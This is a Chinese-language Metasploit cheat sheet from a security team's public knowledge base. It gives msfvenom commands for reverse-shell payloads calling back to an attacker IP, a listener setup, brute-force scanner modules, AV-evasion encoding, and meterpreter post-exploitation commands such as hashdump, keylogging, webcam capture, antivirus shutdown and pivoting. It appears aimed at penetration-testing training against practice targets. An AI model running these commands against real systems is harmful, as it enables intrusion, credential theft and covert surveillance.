<!DOCTYPE html>
<html lang="en-US">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
    <title>Metasploit漏洞利用框架 | 狼组安全团队公开知识库</title>
    <meta name="description" content="">
    <meta name="generator" content="VuePress 1.7.1">
    <link rel="icon" href="/assets/logo.svg">
    <script type="text/javascript" src="/assets/js/push.js"></script>
    <meta name="description" content="致力于打造信息安全乌托邦">
    <meta name="referrer" content="never">
    <meta name="keywords" content="知识库,公开知识库,狼组,狼组安全团队知识库,knowledge">
    <link rel="preload" href="/assets/css/0.styles.32ca519c.css" as="style"><link rel="preload" href="/assets/js/app.f7464420.js" as="script"><link rel="preload" href="/assets/js/2.26207483.js" as="script"><link rel="preload" href="/assets/js/68.c1db2a2b.js" as="script"><link rel="prefetch" href="/assets/js/10.55514509.js"><link rel="prefetch" href="/assets/js/11.ec576042.js"><link rel="prefetch" href="/assets/js/12.a5584a2f.js"><link rel="prefetch" href="/assets/js/13.c9f84b2e.js"><link rel="prefetch" href="/assets/js/14.d2a5440c.js"><link rel="prefetch" href="/assets/js/15.2f271296.js"><link rel="prefetch" href="/assets/js/16.0895ce42.js"><link rel="prefetch" href="/assets/js/17.627e2976.js"><link rel="prefetch" href="/assets/js/18.73745a4c.js"><link rel="prefetch" href="/assets/js/19.19350186.js"><link rel="prefetch" href="/assets/js/20.e4eac589.js"><link rel="prefetch" href="/assets/js/21.fc0657ba.js"><link rel="prefetch" href="/assets/js/22.f4a1220f.js"><link rel="prefetch" href="/assets/js/23.c8cce92d.js"><link rel="prefetch" href="/assets/js/24.46225ec2.js"><link rel="prefetch" href="/assets/js/25.9b6d75e4.js"><link rel="prefetch" href="/assets/js/26.288f535e.js"><link rel="prefetch" href="/assets/js/27.865bdc75.js"><link rel="prefetch" href="/assets/js/28.f4224fef.js"><link rel="prefetch" href="/assets/js/29.6393a40b.js"><link rel="prefetch" href="/assets/js/3.a509f503.js"><link rel="prefetch" href="/assets/js/30.d5a49f97.js"><link rel="prefetch" href="/assets/js/31.eb3647df.js"><link rel="prefetch" href="/assets/js/32.7f48a571.js"><link rel="prefetch" href="/assets/js/33.1f374ffa.js"><link rel="prefetch" href="/assets/js/34.5a911179.js"><link rel="prefetch" href="/assets/js/35.d2bcc7ef.js"><link rel="prefetch" href="/assets/js/36.42e440bd.js"><link rel="prefetch" href="/assets/js/37.dedbbdea.js"><link rel="prefetch" href="/assets/js/38.d68d1f69.js"><link rel="prefetch" href="/assets/js/39.e278f860.js"><link rel="prefetch" href="/assets/js/4.35636da8.js"><link rel="prefetch" href="/assets/js/40.97f4e937.js"><link rel="prefetch" href="/assets/js/41.38630688.js"><link rel="prefetch" href="/assets/js/42.cae56aa5.js"><link rel="prefetch" href="/assets/js/43.61a04b16.js"><link rel="prefetch" href="/assets/js/44.5c6230f2.js"><link rel="prefetch" href="/assets/js/45.0f1355ae.js"><link rel="prefetch" href="/assets/js/46.c1906649.js"><link rel="prefetch" href="/assets/js/47.7ae220ce.js"><link rel="prefetch" href="/assets/js/48.59af224e.js"><link rel="prefetch" href="/assets/js/49.6a33a171.js"><link rel="prefetch" href="/assets/js/5.08ab40ee.js"><link rel="prefetch" href="/assets/js/50.f14601d2.js"><link rel="prefetch" href="/assets/js/51.f20841fd.js"><link rel="prefetch" href="/assets/js/52.fb0a5327.js"><link rel="prefetch" href="/assets/js/53.8013048c.js"><link rel="prefetch" href="/assets/js/54.d132c2f8.js"><link rel="prefetch" href="/assets/js/55.87aa8b5d.js"><link rel="prefetch" href="/assets/js/56.161f38ad.js"><link rel="prefetch" href="/assets/js/57.bd6a2ef2.js"><link rel="prefetch" href="/assets/js/58.8a69f15a.js"><link rel="prefetch" href="/assets/js/59.93c0e2de.js"><link rel="prefetch" href="/assets/js/6.fda5ce3a.js"><link rel="prefetch" href="/assets/js/60.10091d44.js"><link rel="prefetch" href="/assets/js/61.cd1e3b10.js"><link rel="prefetch" href="/assets/js/62.9c0ad8c5.js"><link rel="prefetch" href="/assets/js/63.4a8dd9d2.js"><link rel="prefetch" href="/assets/js/64.6bf3fede.js"><link rel="prefetch" href="/assets/js/65.7a2ccc50.js"><link rel="prefetch" href="/assets/js/66.874d563b.js"><link rel="prefetch" href="/assets/js/67.bb86eab2.js"><link rel="prefetch" href="/assets/js/69.8141480b.js"><link rel="prefetch" href="/assets/js/7.d1fe6bef.js"><link rel="prefetch" href="/assets/js/70.9fb74c80.js"><link rel="prefetch" href="/assets/js/71.d1e4e9ab.js"><link rel="prefetch" href="/assets/js/72.e6bf83fb.js"><link rel="prefetch" href="/assets/js/73.6dd6c980.js"><link rel="prefetch" href="/assets/js/74.3612ba47.js"><link rel="prefetch" href="/assets/js/75.6e1a2434.js"><link rel="prefetch" href="/assets/js/76.5bfa4bcc.js"><link rel="prefetch" href="/assets/js/77.784df031.js"><link rel="prefetch" href="/assets/js/78.aa94a0a0.js"><link rel="prefetch" href="/assets/js/79.c4e9a4f2.js"><link rel="prefetch" href="/assets/js/8.63fd05d7.js"><link rel="prefetch" href="/assets/js/80.8d47d1f7.js"><link rel="prefetch" href="/assets/js/81.1160b022.js"><link rel="prefetch" href="/assets/js/82.7d17e5c8.js"><link rel="prefetch" href="/assets/js/83.a2ff144a.js"><link rel="prefetch" href="/assets/js/84.53d29383.js"><link rel="prefetch" href="/assets/js/9.b49161a4.js">
    <link rel="stylesheet" href="/assets/css/0.styles.32ca519c.css">
  </head>
  <body>
    <div id="app" data-server-rendered="true"><div class="theme-container"><header class="navbar"><div class="ant-row"><div class="nav-button"><i aria-label="icon: bars" class="anticon anticon-bars"><svg viewBox="0 0 1024 1024" focusable="false" data-icon="bars" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M912 192H328c-4.4 0-8 3.6-8 8v56c0 4.4 3.6 8 8 8h584c4.4 0 8-3.6 8-8v-56c0-4.4-3.6-8-8-8zm0 284H328c-4.4 0-8 3.6-8 8v56c0 4.4 3.6 8 8 8h584c4.4 0 8-3.6 8-8v-56c0-4.4-3.6-8-8-8zm0 284H328c-4.4 0-8 3.6-8 8v56c0 4.4 3.6 8 8 8h584c4.4 0 8-3.6 8-8v-56c0-4.4-3.6-8-8-8zM104 228a56 56 0 1 0 112 0 56 56 0 1 0-112 0zm0 284a56 56 0 1 0 112 0 56 56 0 1 0-112 0zm0 284a56 56 0 1 0 112 0 56 56 0 1 0-112 0z"></path></svg></i> <span></span></div> <div class="ant-col ant-col-xs-24 ant-col-sm-24 ant-col-md-6 ant-col-lg-5 ant-col-xl-5 ant-col-xxl-4"><a href="/" class="router-link-active home-link"><img src="/assets/logo.svg" alt="狼组安全团队公开知识库" class="logo"> <span class="site-name">狼组安全团队公开知识库</span></a> <div class="search-box mobile-search"><input aria-label="Search" autocomplete="off" spellcheck="false" value=""> <!----></div></div> <div class="ant-col ant-col-xs-0 ant-col-sm-0 ant-col-md-18 ant-col-lg-19 ant-col-xl-19 ant-col-xxl-20"><div class="search-box"><input aria-label="Search" autocomplete="off" spellcheck="false" value=""> <!----></div> <nav class="nav-links can-hide"><ul role="menu" id="nav" class="ant-menu ant-menu-horizontal ant-menu-root ant-menu-light"><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/" class="router-link-active">
          首页
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/guide/">
          使用指南
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/knowledge/" class="router-link-active">
          知识库
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/opensource/">
          开源项目
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="visibility:hidden;position:absolute;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li></ul> <a href="https://github.com/wgpsec" target="_blank" rel="noopener noreferrer" class="repo-link"><i aria-label="icon: github" class="anticon anticon-github"><svg viewBox="64 64 896 896" focusable="false" data-icon="github" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M511.6 76.3C264.3 76.2 64 276.4 64 523.5 64 718.9 189.3 885 363.8 946c23.5 5.9 19.9-10.8 19.9-22.2v-77.5c-135.7 15.9-141.2-73.9-150.3-88.9C215 726 171.5 718 184.5 703c30.9-15.9 62.4 4 98.9 57.9 26.4 39.1 77.9 32.5 104 26 5.7-23.5 17.9-44.5 34.7-60.8-140.6-25.2-199.2-111-199.2-213 0-49.5 16.3-95 48.3-131.7-20.4-60.5 1.9-112.3 4.9-120 58.1-5.2 118.5 41.6 123.2 45.3 33-8.9 70.7-13.6 112.9-13.6 42.4 0 80.2 4.9 113.5 13.9 11.3-8.6 67.3-48.8 121.3-43.9 2.9 7.7 24.7 58.3 5.5 118 32.4 36.8 48.9 82.7 48.9 132.3 0 102.2-59 188.1-200 212.9a127.5 127.5 0 0 1 38.1 91v112.5c.8 9 0 17.9 15 17.9 177.1-59.7 304.6-227 304.6-424.1 0-247.2-200.4-447.3-447.5-447.3z"></path></svg></i></a></nav></div></div> <!----></header> <aside class="sidebar"><div><div class="promo"><div id="promo_3"><div class="promo_title">赞助商</div> <button type="button" class="ant-btn ant-btn-primary ant-btn-background-ghost"><span>成为赞助商</span></button></div></div> <div role="separator" id="reset-margin" class="ant-divider ant-divider-horizontal ant-divider-dashed"></div></div> <ul class="sidebar-links"><li><a href="/knowledge/" aria-current="page" title="知识库广告位招租" class="sidebar-link">知识库广告位招租</a></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>CTF</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>基础知识</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading open"><span>工具手册</span> <span class="arrow down"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <ul class="sidebar-links sidebar-group-items"><li><a href="/knowledge/tools/nmap.html" title="nmap端口扫描" class="sidebar-link">nmap端口扫描</a></li><li><a href="/knowledge/tools/sqlmap.html" title="sqlmap简要手册" class="sidebar-link">sqlmap简要手册</a></li><li><a href="/knowledge/tools/metasploit.html" aria-current="page" title="Metasploit漏洞利用框架" class="active sidebar-link">Metasploit漏洞利用框架</a></li><li><a href="/knowledge/tools/burpsuite.html" title="BurpSuite简要手册" class="sidebar-link">BurpSuite简要手册</a></li><li><a href="/knowledge/intranet/Cobalt-Strike.html" title="Cobalt Strike" class="sidebar-link">Cobalt Strike</a></li><li><a href="/knowledge/intranet/Aggressor-script.html" title="Aggressor-Script" class="sidebar-link">Aggressor-Script</a></li></ul></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>Web安全</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>攻防对抗</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>代码审计</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li></ul></aside> <main class="page"> <div class="theme-antdocs-content content__default"><h1 id="基本介绍">基本介绍 <a href="#基本介绍" class="header-anchor">#</a></h1> <h2 id="metasploit模块划分">Metasploit模块划分 <a href="#metasploit模块划分" class="header-anchor">#</a></h2> <p>MSF是渗透测试领域最流行的渗透测试框架，它有以下几个模块：</p> <blockquote><p>辅 助 模 块 (Auxiliary，扫描器)，扫描主机系统，寻找可用漏洞；</p> <p>渗透攻击模块 (Exploits)，选择并配置一个漏洞利用模块；</p> <p>攻击载荷模块 (Payloads)，选择并配置一个攻击载荷模块；</p> <p>后渗透攻击模块 (Post)，用于内网渗透的各种操作；</p> <p>编 码 器 模 块 (Encoders)，选择编码技术，绕过杀软（或其他免杀方式）；</p></blockquote> <p>所有模块位置：<code>/usr/share/metasploit-framework/modules/</code></p> <p><strong>渗透步骤（Exploit）</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>search xxx		<span class="token comment">#搜索某个漏洞</span>
use xxx			<span class="token comment">#使用某个漏洞利用模块</span>
show options	<span class="token comment">#查看配置选项</span>
<span class="token builtin class-name">set</span> payload		<span class="token comment">#配置攻击载荷</span>
exploit			<span class="token comment">#执行渗透攻击</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><h2 id="参数摘要">参数摘要 <a href="#参数摘要" class="header-anchor">#</a></h2> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>reload_all		<span class="token comment">#从目录重载所有模块</span>
back	<span class="token comment">#后退命令，移出当前上下文，用于模块切换</span>
info	<span class="token comment">#目标和模块详细信息</span>
check	<span class="token comment">#检查目标是否受某个漏洞影响</span>

sessions		<span class="token comment">#会话管理</span>
sessions -l		<span class="token comment">#列出所有会话</span>
sessions -K		<span class="token comment">#终止所有会话</span>
sessions -i <span class="token function">id</span>	<span class="token comment">#进入某个会话</span>
sessions -v		<span class="token comment">#以详细模式列出会话</span>
sessions -u		<span class="token comment">#在许多平台上将shell升级到meterpreter会话</span>

show options	<span class="token comment">#显示可选选项</span>
	 auxiliary	<span class="token comment">#显示所有辅助模块</span>
	 exploits	<span class="token comment">#显示所有漏洞利用模块</span>
	 payloads	<span class="token comment">#显示所有有效载荷</span>
	 targets	<span class="token comment">#显示所有可用目标</span>
	 advanced	<span class="token comment">#显示更多高级选项</span>
	 encoders	<span class="token comment">#显示可用编码器列表</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br><span class="line-number">16</span><br><span class="line-number">17</span><br><span class="line-number">18</span><br><span class="line-number">19</span><br></div></div><h1 id="使用辅助模块-auxiliary">使用辅助模块（Auxiliary） <a href="#使用辅助模块-auxiliary" class="header-anchor">#</a></h1> <h3 id="端口扫描">端口扫描 <a href="#端口扫描" class="header-anchor">#</a></h3> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>use auxiliary/scanner/portmap/portmap_amp
use auxiliary/scanner/portscan/ftpbounce
use auxiliary/scanner/portscan/tcp
use auxiliary/scanner/portscan/ack
use auxiliary/scanner/portscan/syn
use auxiliary/scanner/portscan/xmas
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br></div></div><h3 id="服务扫描">服务扫描 <a href="#服务扫描" class="header-anchor">#</a></h3> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>auxiliary/scanner/ssh/ssh_login		<span class="token comment">#SSH爆破</span>
auxiliary/scanner/vnc/vnc_none_auth	<span class="token comment">#VNC空口令扫描</span>
auxiliary/scanner/telnet/telnet_login<span class="token comment">#SSH爆破</span>
auxiliary/scanner/smb/smb_version	<span class="token comment">#SMB系统版本扫描</span>
auxiliary/scanner/smb/smb_enumusers	<span class="token comment">#SMB枚举</span>
auxiliary/scanner/smb/smb_login		<span class="token comment">#SMB弱口令登录</span>
auxiliary/admin/smb/psexec_command	<span class="token comment">#登录SMB且执行命令</span>

auxiliary/scanner/mssql/mssql_ping	<span class="token comment">#MSSQL主机信息扫描</span>
auxiliary/admin/mssql/mssql_enum	<span class="token comment">#MSSQL枚举</span>
auxiliary/scanner/mysql/mysql_login	<span class="token comment">#MySQL弱口令扫描</span>
auxiliary/admin/mysql/mysql_enum	<span class="token comment">#MySQL枚举</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br></div></div><h1 id="攻击载荷和编码-payloads-encoders">攻击载荷和编码（Payloads &amp;&amp; Encoders） <a href="#攻击载荷和编码-payloads-encoders" class="header-anchor">#</a></h1> <p><strong>MSF可以用以下方式，生成payload和编码</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>use windows/meterpreter_reverse_http

-E   强制编码
-e   要使用的编码器模块的名称
-f   输出文件名（否则为stdout）
-t   输出格式: raw,ruby,rb,perl,pl,c,java,dll,exe,elf,vbs,asp,war等
-b   要避免的字符列表: <span class="token string">'<span class="token entity" title="\x00">\x00</span><span class="token entity" title="\xff">\xff</span>'</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br></div></div><p><strong>但是我个人更喜欢用<code>msfvenom</code>生成<code>shellcode</code>然后编码免杀。</strong></p> <p><strong>Windows</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>msfvenom -p windows/x64/meterpreter/reverse_tcp <span class="token assign-left variable">LHOST</span><span class="token operator">=</span>Kali的IP <span class="token assign-left variable">LPORT</span><span class="token operator">=</span>Kali监听端口 -f exe <span class="token operator">&gt;</span> msf.exe

参数选项：
-p			指定的payload
-e 			编码器，x86/shikata_ga_nai
-i			迭代器，对有效载荷的编码次数
-f			输出文件的格式,exe、dll、raw
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br></div></div><p><strong>Linux</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>msfvenom -p linux/x86/meterpreter/reverse_tcp <span class="token assign-left variable">LHOST</span><span class="token operator">=</span><span class="token number">10.1</span>.1.15 <span class="token assign-left variable">LPORT</span><span class="token operator">=</span><span class="token number">6666</span> -f elf <span class="token operator">&gt;</span> msf.elf
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><h1 id="监听反弹shell">监听反弹shell <a href="#监听反弹shell" class="header-anchor">#</a></h1> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>msf5 <span class="token operator">&gt;</span> use exploit/multi/handler
msf5 exploit<span class="token punctuation">(</span>multi/handler<span class="token punctuation">)</span> <span class="token operator">&gt;</span> <span class="token builtin class-name">set</span> payload windows/meterpreter/reverse_tcp
msf5 exploit<span class="token punctuation">(</span>multi/handler<span class="token punctuation">)</span> <span class="token operator">&gt;</span> <span class="token builtin class-name">set</span> LHOST <span class="token number">10.1</span>.1.15
msf5 exploit<span class="token punctuation">(</span>multi/handler<span class="token punctuation">)</span> <span class="token operator">&gt;</span> <span class="token builtin class-name">set</span> LPORT <span class="token number">6666</span>
msf5 exploit<span class="token punctuation">(</span>multi/handler<span class="token punctuation">)</span> <span class="token operator">&gt;</span> run
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><h1 id="meterpreter用例">Meterpreter用例 <a href="#meterpreter用例" class="header-anchor">#</a></h1> <p>刚获得<code>Meterpreter Shell</code>时，该Shell是极其脆弱的，可以把它和目标机中一个稳定的程序绑定</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>getpid			<span class="token comment">#查看当前Meterpreter Shell的进程号</span>
<span class="token function">ps</span>				<span class="token comment">#获取目标机正运行的进程</span>
migrate <span class="token number">476</span>		<span class="token comment">#将shell迁移到PID为786的进程中</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br></div></div><h2 id="命令摘要">命令摘要 <a href="#命令摘要" class="header-anchor">#</a></h2> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>pwd、ls、cd
getuid		<span class="token comment">#查看当前权限</span>
getsystem	<span class="token comment">#获得系统管理员权限（要本地管理员权限运行）</span>
hashdump	<span class="token comment">#抓哈希密码</span>
sysinfo		<span class="token comment">#查看系统信息</span>
idletim     <span class="token comment">#查看目标系统已运行时间</span>
route		<span class="token comment">#查看目标机完整网络设置</span>
shell		<span class="token comment">#进入目标机shell，exit退出she</span>
background	<span class="token comment">#将meterpreter隐藏在后台</span>

upload ./1.txt c:<span class="token punctuation">\</span><span class="token punctuation">\</span><span class="token number">1</span>.txt		<span class="token comment">#上传文件</span>
download c:<span class="token punctuation">\</span><span class="token number">1</span>.txt ./			<span class="token comment">#下载文件</span>
search -f *.txt -d c://			<span class="token comment">#搜索文件</span>

keyscan_start	<span class="token comment">#启动键盘记录</span>
keyscan_stop	<span class="token comment">#停止键盘记录</span>
keyscan_dump	<span class="token comment">#转储键盘记录的内容</span>
screenshot		<span class="token comment">#抓取截屏</span>
webcam_list		<span class="token comment">#摄像头列表</span>
webcam_snap		<span class="token comment">#摄像头拍照</span>
webcam_stream	<span class="token comment">#抓取视频</span>

<span class="token comment">#Kali-Linux下登录远程桌面</span>
<span class="token function">sudo</span> rdesktop -f 目标IP

route <span class="token function">add</span> IP 子网掩码    <span class="token comment">#添加路由，先background</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br><span class="line-number">16</span><br><span class="line-number">17</span><br><span class="line-number">18</span><br><span class="line-number">19</span><br><span class="line-number">20</span><br><span class="line-number">21</span><br><span class="line-number">22</span><br><span class="line-number">23</span><br><span class="line-number">24</span><br><span class="line-number">25</span><br><span class="line-number">26</span><br></div></div><h1 id="后渗透模块-post">后渗透模块（Post） <a href="#后渗透模块-post" class="header-anchor">#</a></h1> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>run post/windows/gather/checkvm		<span class="token comment">#检查目标是否虚拟机</span>
run post/linux/gather/checkvm
run post/windows/manage/killav		<span class="token comment">#关闭杀软</span>
run post/windows/manage/enable_rdp	<span class="token comment">#开启目标远程桌面</span>
run post/windows/gather/enum_logged_on_users	<span class="token comment">#列举当前登陆用户，和最近登陆过的用户</span>
run post/windows/gather/enum_applications		<span class="token comment">#列举应用程序</span>
run windows/gather/credentials/windows_autologin<span class="token comment">#列举自动登陆的用户名和密码</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br></div></div><p>MSF官方后渗透模块参考：https://www.offensive-security.com/metasploit-unleashed/post-module-reference/</p> <h1 id="网络穿透">网络穿透 <a href="#网络穿透" class="header-anchor">#</a></h1> <p><strong>拿到反向shell之后，获取目标网络信息</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>meterpreter <span class="token operator">&gt;</span> run get_local_subnets
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><strong>使用<code>autoroute</code>模块添加路由</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>meterpreter <span class="token operator">&gt;</span> run autoroute -s <span class="token number">10.0</span>.0.0/255.0.0.0
meterpreter <span class="token operator">&gt;</span> run autoroute -p		<span class="token comment">#列出添加了路由规则的存活session</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p>添加完成后返回上一层，这里一定要保证添加了路由规则的sessions的存活,如果sessions掉了对应的路由规则也就失效了</p> <p>添加完成后使用ms17_010的扫描脚本进行目标内网的扫描</p> <h1 id="msf靶机">MSF靶机 <a href="#msf靶机" class="header-anchor">#</a></h1> <p><strong>Metasploitable2：</strong></p> <p>下载地址：https://sourceforge.net/projects/metasploitable/</p> <p>官方教程：https://metasploit.help.rapid7.com/docs/metasploitable-2</p> <p><strong>Metasploitable3</strong>：</p> <p>下载地址：https://github.com/rapid7/metasploitable3/</p> <p>视频教程演示：https://www.youtube.com/playlist?list=PLZOToVAK85MpnjpcVtNMwmCxMZRFaY6mT</p></div> <footer class="page-edit"><!----> <div class="last-updated"><span class="prefix">上次更新:</span> <span class="time">12/18/2021, 12:46:42 PM</span></div></footer> <div class="page-nav"><p class="inner"><span class="prev"><a href="/knowledge/tools/sqlmap.html" class="prev"><i aria-label="icon: left" class="anticon anticon-left"><svg viewBox="64 64 896 896" focusable="false" data-icon="left" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M724 218.3V141c0-6.7-7.7-10.4-12.9-6.3L260.3 486.8a31.86 31.86 0 0 0 0 50.3l450.8 352.1c5.3 4.1 12.9.4 12.9-6.3v-77.3c0-4.9-2.3-9.6-6.1-12.6l-360-281 360-281.1c3.8-3 6.1-7.7 6.1-12.6z"></path></svg></i>
        sqlmap简要手册
      </a></span> <span class="next"><a href="/knowledge/tools/burpsuite.html">
        BurpSuite简要手册
        <i aria-label="icon: right" class="anticon anticon-right"><svg viewBox="64 64 896 896" focusable="false" data-icon="right" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M765.7 486.8L314.9 134.7A7.97 7.97 0 0 0 302 141v77.3c0 4.9 2.3 9.6 6.1 12.6l360 281.1-360 281.1c-3.9 3-6.1 7.7-6.1 12.6V883c0 6.7 7.7 10.4 12.9 6.3l450.8-352.1a31.96 31.96 0 0 0 0-50.4z"></path></svg></i></a></span></p></div> </main> <!----></div><div class="global-ui"></div></div>
